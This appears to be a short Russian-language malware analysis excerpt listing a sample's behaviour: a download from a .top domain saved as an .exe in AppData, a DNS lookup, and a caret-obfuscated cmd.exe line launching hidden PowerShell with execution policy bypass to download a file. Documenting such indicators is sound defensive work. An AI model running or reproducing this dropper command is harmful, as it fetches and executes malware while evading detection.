Техническая информация
- http://www.ddoeroole.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RSHeLl^.^ex^E^ ^-eXEcUTIONPOli^c^Y ^B^yPAsS -^N^oProfi^lE -^wi^nd^owSt^yle HIDDen ^(ne^w^-^O^bJ^eCt ^SySTe^m.nEt.^we^bClI^en^T)^.^dO^w^nLo^ADf^I^lE^(^'http://www.ddoero...
- DNS ASK dd###oole.top
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RSHeLl^.^ex^E^ ^-eXEcUTIONPOli^c^Y ^B^yPAsS -^N^oProfi^lE -^wi^nd^owSt^yle HIDDen ^(ne^w^-^O^bJ^eCt ^SySTe^m.nEt.^we^bClI^en^T)^.^dO^w^nLo^ADf^I^lE^(^'http://www.ddoero...' (со скрытым окном)